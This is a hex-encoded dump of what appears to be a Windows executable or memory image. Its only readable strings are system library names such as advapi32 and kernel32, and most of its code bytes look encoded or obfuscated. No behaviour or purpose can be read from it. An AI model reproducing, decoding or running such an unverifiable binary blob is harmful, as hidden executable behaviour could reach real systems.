0a975635fc34023e3f4000074df7004617afc864e4b935edd700468c3402324241700b7cb44cfe36e3cb1080000e8e4b1420074cf6004a37dff0e4b0060006cc3d7784428c3ff505438cb4784011e1e1f019c83131bcb6faccb5291c5c16804c846154400b7c3cf600c27b9659bc38307b8b355742580800080fc581c38747844c3c76804a32209ab0300fdb5cb47841b980f84c1d5782c5f1fcb6fdcb3e7400420b9b1080000e8d78343006f2bb803000089d578001f2662a6d900741a262b98b3c38e7ea2d90048c38ffcb0cd45b577e9bedec35cd528e4fb37c0756d51c3865387d90048c387f511e9141500837b078b70fbbb600468c38e409cd90048c387f4b0cb42f1cfea22182f0048c3863de9d90048c387f511cf9e4600b7c38e25f9d90048cba7dcf8ff3c286d3fb1080000e8e1b5430074cf600468c3d7786408cb47f46f9c0f008c131bcb6fcc68c35252ca55d529e5a5a97553acca55d529eeaea9756955c3c241e03e6e47000f71e277ab410100ccf388c1ca4b40c18a8aca5358cb47e47b988bcd4cc68b84010100531bcb6fcc68c35291c3c251507336cd05c5007471ed71214700b7c3c06b687336bb73c5007471ed6f3f4700b7c3c063607336a169c5007471ed9dcd4700b7c3c07b787336af67c5007471ed8bdb4700b7c3c073707336955dc5007471edb9e94700b7c3c00b087336834bc5007471edd7874700b7c3c0030073368941c5007471edc5954700b7c3c0232073369f57c5007471edf3a34700b7c3c03b387336854dc5007471ede1b14700b7c3c03330733673bbc5007471ed1f404800b7c3000b8000004873367cb4c5007471ed0a554800b7c3000388000048733669a1c5007471ed257a4800b7c3001b9000004873365a92c5007471ed500f4800b7cb47e47b980f0084cd4cbd12351bcb6fcc68c35291c382417336ac65c4007471ed7a254800b7c3c0434073369a53c4007471ed68374800b7c3c05b5873368049c4007471ed86d94800b7c3c013107336ce07c4007471edb4eb4800b7c3c02b287336b47dc4007471eda2fd4800b7cb47e47b988bc1d5782c40c1fd5034471fcb6fcc13ccb7c589d599c37bb8c3529163dab9cb45c14f892fed4b73f3804748b0bfcd7382605cc380e3e2bd4800b7b7388fc5d6534073c58b99a4c3d7781478c3ff501c70cb47e47f9c0f0084cd4cc68b7afe000048c1d5782c40c1e54834461ecb6fcc9dba07000048c352525e3d697e0000b7c5c673b35e3d9e89000072f8708e5d9ec5c63b9880970000b7c5065bd000008b5d3eb2a50000b7c506bb3101008dd8ae13a3b40000b7c300cb410100e86b354900b7c300c3490100e89fc14900b7c300db510100e883dd4900b7c506eb6101008b5e3df1e60000b7c506139901008b5e3de3f40000b7c5065bd101008b5d3e15030100b7c506bb3202008b5d3e07110100b7c5061b9202008dd8ae13081e0100b7c3002ba20200e8f0ae4900b7c30023aa0200e8e4ba4900b7c3003bb20200e8e8b64900b7c30033ba0200e81c414a00b7c3d7781478c3e7481c70cb47e47e9df0f3f839757a4673f9b67d41b73f40bc34087587310f0000478edf0fd500c30f84c1d5782c44c5c56804771fcb6fcc69c272b0c2535381e2c0d007006fd8c3884b2b6b40c35a99c34a898939fe4ac1883de9d1008361dd778923e44fc28fc436b25428397550cc15050700b7c34337ea85bc2c0033e85e45b56bf6557b3900b7c35327ea29172b00898aeb250b390038c7090900008348347484e7011e080074488bc3d7781478cb47e47f9c4ac5682c40cb6fd4702bb25279048b78e5735d390038c709090000eb87e94cb120632eac6dd400732318c34186c188a87dd0008362de77c3498a8939fe4e8920e74fc28fc436b24c3039755965c5c96064c9dd7074d9dd707c14c1c1687418c5d9707c10c1cd60046cc1c9600468c5c1686ca01503010014f8fbdaf4390038c709090000e8efc23a007c4b37b7cb47fcfb0f000084c1d5782c5d030116151514141717161fc367a4c96d6c80000048c38e7ec2b900487bf78cc1ccb5b82b91bac5881fcad0004cc775bbce6aa8883ef98565d9778927e04bc67bbcc5cc9d90c352944ee3aac18ffcb0c3cf741860c1cc952fea7c422b0033e15bcc8984c19a5ac27577da5b4576cffb8ce765010044cea563c1b8fd07cf0066efdc958bc09fea74c67e0fcb37c5706a94ce760cbe611a73c47e0f7cf9ba02000048c5d8b568cda5a4cce58c0aaead101a1d00f0b9b9b5ba80800066e3915c3c5d6072c7f38c6cef000041f9ba02000048c5c08d88c35c3fa7af1f007c7b07f08b70f4000048b7382cf05af9b901000048c35c9fc5c08d28c7cf1f007c7b07f08b50d4000048cbe7401c3848c5c8ada0cbe74014304cc1c8854bc6818df8b8010000c783600c2d05000033e19ac1cd600468b73838ead8e4290044cf7b7545cf8b1094000048c3c69d9cc1c08580cbe740042048c5d8bdaccf4b3fea427d2a0033e15745b41fe0c043236695dbcc46c24f407d4cbdba1023c17df77f417cc3c69d5dcf4f45c1dd700464c9cf4349c5d891a2efcc8188c1c08537ea0d322a0033e15745b458affeb5c9735cd1bc4bf7bc474d72c7155f480100758d4cc087f276cc750f75c08ffa7ecc7c0d39fbbc47efe3f7eabd802800898a4bc3488bc3c6bdb87bff2487ec7c00b7c317b8e4c0000048c94544800000411e1e1f1f1c1c1d0301039e8bc1d5782c40c1e5483c4e011617eee8441400e804f61a004863cba8c38e77c5b700487bf78cc10da06454140048c352952fb19bc24983ca62a18939fe4ec5800dcece0041c261dd764aeb6ba02349c27b73e0670448c38fc542e06b08498823e448c5ff64386477feb61c27c5f158640873ce8657ae8c4eb739fa367f7cf6bc4bcec10a45b7384f8f4fb7388fc509a01b2b14004873c38aa59fcbe740042048c5c960646bd3b4c1c1681474cf4c8fc5d9706409c24531eaedd028008545b46699cf60143142473ffcb57d4773ce87e970e3f7eab1832700898a4bc3488bc307a864541400487bff248fe57d00b3c111b87444140049c2d07b69c2e05b79c268a21f01019d0f000084c1d5782c40c1e5483c4e011617eee8441400e80cfd19004863cba8c38e6fdcb600487bf78cc10da06454140048c372b52fb19bc24983ca62a18939fe4ec580f534cc0041c261dd764aeb6ba42749c27b73e4630448c38fc542e46f08498823e448c5ff64386477feca8c0182000048c5d178640873ce86423eb8b14ecb45c464e57bf27f6593c44f0abbb40d000066ef8243cb40c164ef8a4bcb40c14ac509a01a2a14004873e3aab882cbe740042048c5c960640863f394c1c1681478992ab3c5d9706443d892c2458acf483ceaccfe27008545b46699cf60143146433ff8b17d4773ce87fa63e3f7ea90a32600898e4fc34c8fc307a864541400487bff24a0c97e00b3c111b87444140049c2d07b69c2e05b79c268a21f01019d8bc1d5782c40c1e5483c4e01161515171716efc8641400e82cdc18004863cba8c38e4fffb500487bf78cc10da0447414004c2fb19ac35290c24987ce7ab98939fe4ec580d513cb0041c261dd724ef3b98823e44bc673b1c273b0c38fc58fc5ef74381bf343a02348c1ca474976fdc98c4ccf000048c5c960741972c58d5e22b8b847cb44c564e57af37f79b6b70d000066ef9958cb43c264ef8140cb43c24ac501a8dcfe06004873fab3bc86cbe7401c3848c5c1687418cbe74014304cc1c960741863ea0683600c7d580d0048c501a824070700489929b0c1c5680464cf43715014fd0033e12deae1d125008b636d45b43d7ac57345b4477bcbe740042048c519b0240707008b4582c1c1686404cf4e8d4bd298c247886fed39ea645726008545b46c1b7750647bce87bf464c866aec4eca474d72c517dacc000000ea02322500898a4bc3488bc307a844741400487bff2432a58000b3c111b85464140049c2d06b79c2e02b09c268a21e1e1f1f1d03019d0f0084c1d5783458c1fd503c91c5682c5f16151514141717161fcb6fcc65ce73b4c769aa2bba5a78058b6df0c6ee3f007ca320e8ae863f0038c709090000e979900000854cb10c4f267cafce00731f24c378bfc778ba883ff84ac1a06384ca008365d9778927e04dc0cfb1f50fb9fa7c08bb62e07531ce4023e1f80e007c4c30b4c0cfb1f5f6b27408397460fd0552400038c709090000e82a7d40007ca320ebe44ace4c8ec25f5f4023a84000008b737340231b030f00744c2cf0f3762140007ca320e85e09400038c709090000e8633541007c4b37b7c3d7787c10c3ff504428cb47e4611e1e1f1f1c1c1d039c8bc1d5780475030116151514141717161fc367a4cb6f8c53ccbace73b42f82a9c379b7c045b57234f3297299020048cd57a76af7d087400076b1d0b9ee400038c716160000e8ce9841007c4b37169e7502004dc67fbcc58861adc90041c265d972c667a5883cfb4f8827e04ac5e49dbac187e4aac8d66d08b4cebcc33d767e48ca4c302778a975dfe9b4b2750918547a3de193ca4788c9cf40ea7292080041ca4784c1f49d08829b0e007a45cf8b8500010048c58802cec9004ac18fecaab4b27408b88f8b6eea0000e8f6aa4b00b7c303189000004871808139010075635ec588de13c8004ac18fecaa7a444c09368b3bbf000048c588c00dc8004ac187e4a0c5d8adb2c1c77d19d7ea576022008545cf8b199d0000845faf0f85354b7bfa0e88ac2a0100215cad9ec3a91a0de897c77577d4899d72cffb8c8a080100454ab8986e4eb87a250eee080066277afeb046b040c18bd489b227c27ef77f6e5afcb00d000041ca46252dcd080066277afeb067ed3c4ad4892b388eca44c54f76c78f78e05145ea7a4d220089cc959cc7e69d1958b1000045ce4487c5c09d9cc74d87ca5f3c253a08000dfd1f108bf370e17198000048c58803cec8004ac187e4aab4b27509b8f43942b1754f5faf46b16ae8756d9a7af8740c3cce4487c5c09d9cc74d87ca5f3c736105001457f9ce4487c5c09d9cc74d87ca5f3c4b5804001443edce4487c5c09d9cc74d87ca5f3c83920600147fdec1c77d1964c1c099f55cade3f3886965600465ce4c8fc35d9ec1cc912beaefd822008545b57cf6eaad99210089cc955bf6a52afd1f559522fd1e54a5a8c3cea5a88929c8a545b51de3cea56545b459ae7bfd706ef3cb9e420038c709090000e81044430038c705050000e92e3a020074c6ad087d2943001653470200b7c5882ceec7004ac18fecaab4b2740878347d89be24158bff860200173763430038c71c1c0000e85c0843007ca320e96f7b020074cea1cfec8fc317b89cb8000048cb47a4211e1e1f1f1c1c1d0301039e0f000000000000000000000000000084cb6fb43e69700b5004a3be0ef8cb00000f8a6ceb0200666927f0be6927c886697ca0e7522e4771bea669f4e6f2987700666927c08e695b799ec477006669200286dc77000f8b01870200666927f823fce915956958ba8b6920eaca89a92d02006669d4cec2a07700f2fd53797a2778006669201ad29f78000f8b5cd9010066695b711c4079004cc743806b26bac877004c6f2ec5bf7700499830a84ac2a72e4761a6ae69200af0ad78000f8d5ddf0000488929c44a69e4fe365b78006669e4e6166378004cc180890d8900f2fd539638b34e5655cda76927f9b76927e98dc18046327900f2fd1f0d7e1b7800f2fd1f1d26537800f2fd568328fd569338fd569ba46927c812fd57452e4b7800f2fd5755f68c7700f2fd56b912fd568328fd56913afd57451a7f7800f2fd579238fd56852efd579339fd1f3d5e047700f2fd5654265c7700f2fd56b71cfd53b51bb34e1f14c589c598f3668000f2fd1f04d630fd1f351c4e7700f2fd56bf14fd579c36fd578d27fd579aa469601b500468cb479c9ba5000000000069109b8400000000f2fd1f053d5f7700f2fd535935477700f2fd5788b66927e03afd519438fd1f3509547800f2fd1f3d693c7800666927d802fd56a803fd5791af6927f923fd568823fd56bb10fd56b318fd577dd5877700f2fd577525707800f2fd568823fd56bb10fd568b20fd568823fd56b318fd1f0599fa7600f2fd57bd17fd53ba14fd1f25591a7600666927f0be69d4c6ed877700f2fd539f31fd57b8866927eba56927e43efd56bb10fd569b30fd56973cfd56872cfd579c36fd579933fd579ba569601b500468cb479c9ba569e4fe64077600f2fd53497c1f7600f2fd1ffa8c69d4ced8b87500662e4771aeb6697ca6e15269f5d7c69d7600f3fce9131c180c020099f6e56becfd1f1d4b33750044cf8e7a087700e852bd0700eba347109b8400000000f2fd1f1d453d750044cf8e60127700e8749b0700ebc14c0069109b840000000048733e1c6c750074635f733e0575750074ba86430e22527500662e4761aea6f6f669601b500468cb479c9bcc105b4400487bf3052492a3e4f0251887be05241ae6167e7500c53f1c15363c22f6e2bb7400c53cd602eab374000f8bc5430200c5143e02283cd6eaca8965e20100c53c22ceee8f7400c53ea779a6f67500c53cd61a3e7d76000f8b0a8f0100c53c22d6e0997400c53c22c6e8817400c5249280f2c424351d0d251887b60d1c02fe1a497600c53cd60ad28275000f8d33b10000488929c4e92c02fe50307500c5341ae6304875004cc180ab208600c536af960e05b22a55cd8dc18078037600c536aa98043eeb0d94fc7500c53eeb3d7c247500c4261358b4751d7500c426135884d28b7400f2fd1ff024261358b45f377500c53ea2b924263368710c260358750936aa5461187400c53eeb3d89d07400c4262b62421bb34e1f14c589c598375c7e00f2fd1f04d6072eb38d11262b70bc75047400c53ea39a073c961b500468cb479c9b53553eeb056d0c7400c53ea75985f47400c52eb388153ea5940f3eeb35a5f57500c53eeb3db5ed7500c53ea2a83436ab910c36aa8815260b408c76267500c4260b4084471f7500c52eb288141e82bb272eb28b172eb28814168ab32f1e83bd201e87ba233c22c67b137500c53ea79f061e83b8251e8254cbb57300c51e827cebbd7300c526ba5cc3b57300c526ba44b3dd7300c53ea39c013ea399043ea39b063c961b500468cb479c9b062c02fecaac7300c52eb749c2a47300c514a2a1e6f12c32ce2f497300c53cd1ea07142bd7732a7400c53f1c131ca9be0100f0105b4400755beb3eeb1dbbc4720044cf8eea9b7400e8c22f0500c53c961b500468cb479c9ba500000000000069109b8400000000c53eeb1da5da720044cf8ec0b17400e814f80400c53c961b500468cb479c9b53d8733e7c0b720074536f733e6512720074ba86430e82f57200662e4761a68ccf8e96e77400e82ec20400ebef0b105f40c53c961b500468cb479c9b0f84c1d5782c40c1fd5034471fcb6fcc682bba98ca73734083c3791a09091700b7cb7b078a64f9227c490038c70909000048cb4b3714b817cf4483c1c9606c00c35d9ec34337ea77781a008545b57af0ea1d131b008b4320c19f490014389bc3cf606c00cb7b078bbc80c3589fc188b772c0008361dd77c340838938ff4e8923e44fc287c448e47529c5b5c3d7781478c3ff501c70cb47e47f9c0f000025b6a0000033000084c1d5782c5f1fcb6fcc68c35291cd4cbc60fdd18f490038c716160000e8e6bb4a007c4b3714bad24c3074ca55d529e5a5a9754ed213131700b7c34040731071721400b7c3402361582e0074432002ee04008545b97c864c3014f85bc3c06360cd4cbd7ee287cb5b00b7cbe04b2848c34023ce2006008b4c8fc3d7781478cb47e47f9c0f84c1d5783458c1c5682c5f1fcb6fcc68c352eaf388cd4cc69a554545b560fd411c4a0038c716160000e896ca4b007c4b3714c0a0ca55d529e4a4a97573ef3ed30500eb010243792d006fd8c34023c2d500007473b0c340234c762d00744c8fc3d7781c70cb47e47f9c0f0000aaefc5682c40cb6fd470c3868d31b10048cb7a078b79e43dd0050048c38663dfb10048cb7a068a72bf4700ff00ebce6dcbe74004204cc1c1686c09f9b901000048c5d97064bfeaa8a518008545b4add6b8f3606408cb47fcfb0f000084c34f971bcb6fbca2fd1f94a0a48000008b522bfd1f9ca8ac880000ba7a3fff0089c18080c307a8b4900000f2fd1e51a012fd1e59a01afd1e498094c5c990387899090048c5c16804c8dafc31007a45b5728c4023c3220900f2fd1f54606408cb47940b980f000084c1d5782c40c1fd5034471fcb6fccab5291c3797160fc94720f37c97c679756ab76b6b8010000e854b509008360141cbceebd04000040c47d8d655947b558eb7a79e249a8090083601810d77cb631c675625e47b558e8797cb6b1080000e86d8c090083601d15cb60b631c5766e5247b558e9786053b631d7647eb3a9100000e88b6a090083601ebdb631d764605c47b55cea7f7eb499200000e8a140090083600ca7c3ff501c0bf3455e93c3d778143f9b5488cb47e47f9c0f000084c34f9106050116171ec5e5a181c96d1cf000000f2659b880c38e44e6a700487bf78cc1ccaa6479bec77a4b7a3fff00b9399f1f0041ca72b0c25330987808008bc61217c1cd606408c1d57874a2fd1f54607418c3df7064b2fd1e55606ca0091f01000dfd1f6502f245b535c3fe027d77649acefa3c630311fd1e64da2c4bcb8accfafbcfce1a17c5c9606c00c1cd600c60c5d9706408c5c82a2bcf4586c5c1684428c1cd6004c86c800400e86b4f33007b44b440b17a8b4478c3cf60640dc64d34fd1f54606cc3443dfd1f4d32e4de322fc1cd6014c2fd1e55600cdafd1e655004c81d08020014f79744279877070048c3c76864fa7a3fff00e859b60700f2fd1f54606c00c3c6a2a77bff24e77d8d00f0279c90c4e0000048c94534f00000411f010105069e0f00000000000000008c131bcb6ffc5576f3f3fa8dcd8c3bffc10045c8c54940ca4acead2b8d209cb810101891c5682c2beb41d578208ddd702837f3bd591ffac60ed1988923c26843db98c1dd700468c3cf600464cf8efb3ec00024223a3a434a4b8585cd8cea2fc00044cd8ce92cc00033f388cb47d44b988bcb6fd470c588f072870041f8a21b000048c1cd6004c8ed05000048cb47fcfb8bc34f8ccb6f8467265998e727d9b0ca5ade27f099c26be9755e6bc27bf9741c2dcdc998d7588520fd1e418095ce433afd1e51880f8780e1210000c787f8b0080000ebc6ea836064410100000f589732fd1e55601c79f8bb020000f2fd1e4d7814f783600c0a220000c78360042404000048c307a8b4900000f2fd1e5d685c34c7cf605c905f4a0200f027eec9275c507418cb47acab0f0084c1d5782c44c5c56804771fcb6fcc69c272b0c2535381e29c961d006fd8c3884b2b6b40c35a99c34a898939fe4ac188813fbb008361dd778923e44fc28fc436b2542839757de125cd00008b5333e5e6dc854e0038c7090900008348347484e7b8b21d0074488bc3d7781478cb47e47f9c0f000045c5682c40cb6fd4702bb25279048b60fd376f4f007ca320e81f474f0038c709090000eb9ff14cb120632e00aabf00732318c34186c1880cb2bb008362de77c3498a8939fe4e8920e74fc28fc436b24c3039755965c5c96064c9dd7074d9dd707c14c1c1687418c5d9707c10c1cd60046cc1c9600468c5c1686ca0e5f2000014f0f386de4f007ca320e86e364f0038c709090000e8b3f450007c4b37b7cb47fcfb0f000084c1d5782c5f1fcb6fcc682b9a724427808a1d00b7cb7b078a7137e830bc1fc38e7ec1ba00b9bb020000837cfe747c49c43c00b80000757f31c28c68ebb638797563ffddd71d0046b801000048c35330c0ca1d00b773f8b7b54a4427f4fe1d00b7c34337eaa2a413008545b5d852ea707114008b53534427aca51e00b7c35c9bc1881fa0ba008361dd77c344878938ff4e8923e44fc287c40e82552938855eaf78874023b0f750007c4b3714e931f388c3d7781478cb47e47f9c0f0084c1c5682c44c757efe19ac19858c2c84b40c1d95841c2c84b81d94059c2c84b8bcb50e7b6c2c84b81d94c55c2c84b81d97069c2c84b40c1d97861c2c84b8fd744d70f0084cb6fa400cbe740143048c5802aa2850083e7400c2841f9bb0300004576fa8dcdcd60049aba000040bfeaeced140048c18c6fc1ab0048cb478c8b0f84cb6fc460c38654f2ab0048c5cc434acb7bf97770f9eadcdb120048cb47eceb0f000000000000000000aa0069109b840000000048cb6fe407a1b238af8f206ccb47cccb4ac5682c07a1fa702ccbcca1f2782cb1793f0000de6d682c07a1fa702ccba569212baf2e840073677269212bad2c8400767cf8ba4722e53aba4725eb020f000084cb6fa4cbe740143048c3cf605c30c1cd600c60c3cf605438c1cd6004c8ee06000048cb478c8b0f84c34f8cc1d14858c1f96850c1f15868c1c1405d1dc367a4cb6fcc68c3519bca7ac2e16db20d00c049d8554cc3ce5599d95840c3ce5599d95c4db736d0647945c3ce55af308f00c043cb4c0540b736c2767945c3ce55af2c9300c043cb4c0643b736c1757945c3ce55af2e9100c043cb4c0045b736c4707945c3ce55af318e00c043cb4c0c49b736c87c7945c3ce55af2f9000c043cb4c1458c3c65d58c3884b8929efc621e4f327e372498b63f021704940c3c65d58c3884b8929e1c821e3f427e372498b63e839704940c3c65d58c3884b8929e2cb21e2f527e372498b63e435704940c3c65d58c3884b8929e308c33727e372498b63e233704983884bc3c65d588929e4fb27e372498b63e1307049e037dd020048c35b78a9757c40c3c65d93ca451cb8ac707c40c3c65d93ca4504a0a07c7c40c3ce5593cb4408f234d2647c40c3ce5593cb440ef434e2547c40c3ce5593cb440d8a88bab9606000486be2b54a76753d20200074526e753d404000747a4673fab44578c3ce55938b0be8cc6fc3ce5593a3deb6c3ce55938b0ae9fc5fc3ce5593a3ddb5c3ce55938b09eaec4fc3ce5593a3dcb4c3ce55916719f00f00c127e384a13f1ffe01b7c3ce55193978c3ce5558c3fe4dbbcb682182fe3d4074477bc3ce55aa5b1e0000de717068c3ce75bb8340c3ce5599c15858c3ce5593cb286149c3ce5531713028c3ce559b8587c118bba300c3c65d51f95b1c000074ca616162e3434bca8bc86168c3ce7578c38340c3ce5558c1c15858c3ce5593cb286149c3de459bc9222162e3434bca8bcb2228c3ce5558c39d5ec1d900b80ee6000033e19ec1c05d9b448bc9cf43feea9194100048c3c65de6b7491864714d47b58934f1b749007c714d47b5893affb7490c70714d47b58939fcb7490a76714d47b58938fdb7490975714d47b5893f878a8263e37744b36be9756b9c6be9757a8d7bf9745d60c98a0b606000ebf45747b5893e4547b59125e5f85b47b5893d4647b59126e6ec4fc9a2dc6060007cfe3d4074738cca11d98fedec4fc3ca1118c18f4ec3d7781c70c3ff506408c3f7586c00cb47e47d9e0f0084cb6fc4ab7af8756198ccbf7d7bf9766ff082c1540038c722220000ebe0e3b5f6540038c72121000048cb47eceb0f008c131bcb6fccc8adb9030074535b60dcd7bda9030074488bcb47e47b980f000084c1d5783c50c1fd5004771fcb6fcc68c35192c37211feea0300747b79cd601cb3403c265048b6ff7f00dcebebd8f0c446c56814b0bd0892a700007451d337813454c81102040014fcd1c32587a700008bc76814b3625e570c1f040074ff501cd3e38b625e573e2d0400744d8ec3d7786408c3ff506c00cb47e47f9c83131bcb6fcc68c352314e5d04007c60dc34c8484380cb47e47bb24c5e04003384cb6fc4c0637004007c63df77cb47eceb0f33da59720e00ffda9bb00e00cc0000000000802f227d7976fa854fc28dc759934eb8f754514ab8ef5e4ecb43d8514ac385c05eaf6a95db5c4077e9a07881c3400bc98677eaa37c4fbe3e89cb43e86d7ef0b990d1f3030f000000000000000000000084c1d5782c5f1fcb6fcc68c35291c5b0b1c1b200b7c34427dc3400008545b4566a63f497c3589bc344276a7d0000b7cd45b47b84cb64e529f7e8275363e1eae931f388c3d7781478cb47e47f9c0f000084c34a78f4175a00665f317c7730f3038b2b2b74744bcbfbf341b8691545007579b6b1090200665f6849179b54030f0084cb6fc465c6ca7970c34183c25a39e50d0000b8b901000048cb47eceb0f00008c1316ce9350c3519bc2601bb4c74288b7f60448c75aa56752cacb48452e3354f32f944fd2992bab846ff2982aa089c19f0458c3c8539bc340404b4843feb7420c7b7e05b9f742806310bc4fcb847ff983c24292b28e0f970033000000000000000000000000aa0069109b840000000048cb6ffc5cc59d3068c5d5782c457ee897c1d9703c5467fb9d424d91b629c79739351000004d76e82181647127c063e2f0bdc0169bf00f00be87c5034d76e821879aa3c79f3068c7d7782c40cb47d4e2310f0000000000000000000000000000000000000000aa0069109b84000000004cc75295c7599bca7be81f89f670000049ca7bd8563c0263faa27c46c2498b4ac38873f3c783ba35030049c879788000000f89ef6b02000fb59f70feab00010e8c28aa010049c2488fc75497c372b0c24384c74d8fc2790157edc27bb9c27038cc1f12434e1f5c5ce0ff1e10404e1e5d44f8b8c34a02a50069109b840000000048c34a8dc1809bddb400bcc8070df6c3b400494aca361e2174b400df6bb400c175b400cf7bb4000bbeb50010a5b5002095b5003085b500c87cb40060d5b50070c5b500f044b4008035b50048fdb5009025b500b005b500e551b4000f105b4400c3ccb8bd6cef81cb8bc38142c181cbccb8bd4e4bb9f44064ef814cccc842c1ccb9bc8280cb30fc606df1fc707fc3a5f6dcc7890db8fd424c4bb9fc4046c58966efc1404cccc04243c2400848818381cb48814e4bb9f4468d814cccc844c7a5f61b814e4bb8f5468d816e22cdc944c7531b814e4bb8f546404bb9fc4c8f816e22cdc94440ccc04ec58fc78989c1424c4bb9fc4640c58989c1404cccc044cfa5f6dcc7890db9fc4244c58988c040cba5f6dcc7890db8fd4244c58966efc140cb53dcc78989c14244c58989c140cbcc101f4cc78989c1424c4bb8fd4640c58989c1406e22cdc144cfa569109b84000000004cc78989c1424c4bb8fd46484bb9e45c42c58989c1406e22cdc14448ccd85ecdcc1f140e464fc289cb42d151b735cc7b671c27e080cb6211ff1f140e42cb42d1514e1e1a4767ea8cc643818828ee088b0c8800000f2668b1bc77361c8b9a007661fe2bc20000660069109b84000000000f2668a1ef2660b9ff1f140e051f5c461a58c940418000000f2668c18f2660d99f1f544eaaaf1f5c46baf9b636c62668e1af2660f9bf1f544ecacf1f5c46dadf266881cf266099df1f544eeaef1f5c46fa85d8a22668a1a9ca639f7027e92ae7031f140e42cb42d159ca6bf85dc643818828ed70687a000069109b84000000000f1e50b1ff1f140e42cb42d159b636bc9aa6ca63ef7b7944c4890c071f5c4ef2ff1e59b8ff1e50b1b9c24800cc105f400f246aa1ef2462b9ff179c8e0a0202000f1f140e051f5c461a58c940418000000f246ac18f2462d99f1f544eaaaf1f5c46baf9b636c6246ae1af2462f9bf1f544ecacf1f5c46dadf179c8e4a4202000f246a81cf246299df1f544eeaef1f5c46fa85e892a15611d1c70000f0105b4400494acbc71f544efab8cb6af959ca6bf8e637ce7b635fc34a89cb6211ff1fd8c71f140e051e1944c74a8c66e88ec643818828ee731c672628eae66b69105b44000f2668511f2620061f544efaff1f5c46eaa8c968698000000f2668317f2660296f1f544e5a5f1f5c464a09b636c62668115f2660094f1f544e3a3f1f5c462a2f2668713f2660692f1f544e1a1f1f1c067fdba126685159ca639f7027e98cc643818828ed706e7c0069109b84000000000f1e1049cb6af91f1f140e43b636bc85b9ca63ef7b7c494e1f1a4b4e1e1a041e1048c248000f00000000000000000000000000000000aa0069109b84000000004863fa98ca7bf07a50d437c6736072f61a8b3b3e0e7f5964b73e88b6373e37c6729ba3c643818828ea766a52c845b47b858b3b3e0e7f7944b73e88b637bd84b97bf303d8db435b273c53d98828eb76437fc38a49733f0e7f2e13c3ca4940737f4e027d3904c3ca5158737f4e1a654875c3ca5950737f4e126d5b66cb42e169b636bcb884ca63ff52c643818828ea77efd3c38a49733f0e7f6e53cb42c941b636bc9ba7ca63e7ec68cbcb42c940cb42c940cb42c940c3871d5947c78047c68173fadadb435b273c0f0000000000000000000000000000aa0069109b8400000000ff1f2c000000000000000000000000008c151dcb6fcc68c36160c70d08cb47e47db4af2a9300338c151dcb6fcc68c361028705950075c77570cb47e47db4c3469300338c151dcb6fdc78c361a2c38a8a9b58c1c5680ca1dd70046cc1801a729a00b3c7ce35fbde3d20c3c62d8877f696006fd8cb47f46d9e0f8c151dc361a2c38a32fa48b93d0500c0cf9b554a4a9c9e0f8c151dcb6fcc68c361d9fa81cb47e47db4a7da6b00338c151dcb6fcc68c361a2c38a8a83e0365c7d006fd8cb47e47d9e0f8c151dcb6fcc68c36153bb02000048cb47e47db4f38e6b00338c151dcb6fcc68c361a2c3ce0dc38340cb47e47db4e9946b00338c151dcb6fcc68c361a2c30e0d8800008b8340cb47e47db40a706c00338c151dcb6fcc68c36153bc05000048cb47e47db423596c00338c151dcb6fcc68c3616a3d3d80000000747fb2ba030000e8453e6c006fd8cb47e47d9e0f8c151dcb6fcc68c36153bd04000048cb47e47db4641e6c00338c151dcb6fcc68c36153be07000048cb47e47db49de76c00338c151dcb6fcc68c361a2c3c62580f9ae40006fd8cb47e47d9e0f8c151dcb6fcc68c36153b108000048cb47e47db4a8d26c00338c151dcb6fcc68c36153b108000048cb47e47db4c1bb6c00338c151dcb6fcc68c361a2c3ce0dc38340cb47e47db45f642d00338c151dcb6fcc68c36161c61d18cb47e47db4764d2d00338c151dcb6fcc68c361a2c3c67d78cb47e47db466314100338c151dcb6fcc68c361a2c38a80b93d0500c0b4788db9251d00c0b47037f32beebdb901000048cb47e47d9e0f00000000000000000000000000008c151dcb6fcc68c361a2c38a32fa48b93d0500c0cf9b554a4a89cb47e47d9e0fcc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c089480100000000c881480100000000d69f480100000000e4ad480100000000f2bb4801000000006c234e01000000005e114e01000000004a054e010000000038774e0100000000a2e84b0100000000b6fc4b0100000000d09a4b0100000000e4ae4b0100000000004b4a01000000001e554a010000000032794a0100000000460d4a010000000062294a01000000007c374a010000000092d94a0100000000a8e34a0100000000c2894a0100000000d8934a0100000000eca74a0100000000feb54a0100000000125e4d0100000000206c4d010000000038744d01000000004c004d01000000005e124d01000000006e224d01000000007e324d010000000096da4d0100000000aee24d0100000000c68a4d0100000000eea24d0100000000fab64d010000000008454c0100000000165b4c0100000000206d4c01000000002e634c0100000000400d4c0100000000521f4c0100000000602d4c0100000000763b4c01000000008cc14c0100000000a2ef4c0100000000b8f54c0100000000c4894c0100000000d09d4c0100000000e0ad4c0100000000eca14c0100000000004e4f0100000000105e4f0100000000226c4f01000000002c624f010000000038764f0100000000440a4f010000000056184f010000000068264f010000000082cc4f01000000009cd24f0100000000aee04f0100000000bef04f0100000000cc824f0100000000de904f0100000000eaa44f0100000000f8b64f010000000008474e0100000000145b4e010000000028674e01000000007c334e0100000000000000000000000086cc4b0100000000743e4b010000000062284b01000000004e044b01000000003a704b01000000002e644b0100000000105a4b01000000000000000000000000a08c2c808101000010a9b9808101000000000000000000000000000000000000000000000000000068ed8580810100002c54788081010000d079a9808101000000000000000000000000000000000000ccb57980810100004ce1ad80810100004c35798081010000000000000000000000000000000000000000000000000000000000000000000090c9588181010000306a5b81810100000000000000000000c8fd3481810100002c062a8081010000b09a2a8081010000553b05050118194e451d1b0615041d06016e00000000000040763781810100002c062a8081010000b09a2a808101000062030544410d00030c02151d06016e00c0f63781810100002c062a8081010000b09a2a8081010000620305444113001318594e0b12574c090b09131c68000000487f368181010000ac802c808101000063101e8de10100000000000000000000000000000000000004040000000000002025968a1900000000000000000000000000000000000000000000000000000020e4c4808101000038fcc4808101000078bcc48081010000b87cc480810100006161646476766161707069693333323200000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6666696962626565727273732d2d6c6c31312d2d31312d2d31310000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d737379796e6e636368682d2d6c6c31312d2d32322d2d303000000000000000006b6b656572726e6e65656c6c3333323200000000000000000101000003030000462a1f322d00030c63000000000000000101000003030000462a1f35341700650101000003030000462a1f34221122370d191065000000000101000003030000462a1f20361122370d1910650000000002020000030300004927071d1d080d05131f26311b1d1d0a020d3f3606171d06012b3d780000000070b8c880810100008048c880810100008840c880810100009850c88081010000a860c88081010000b870c88081010000c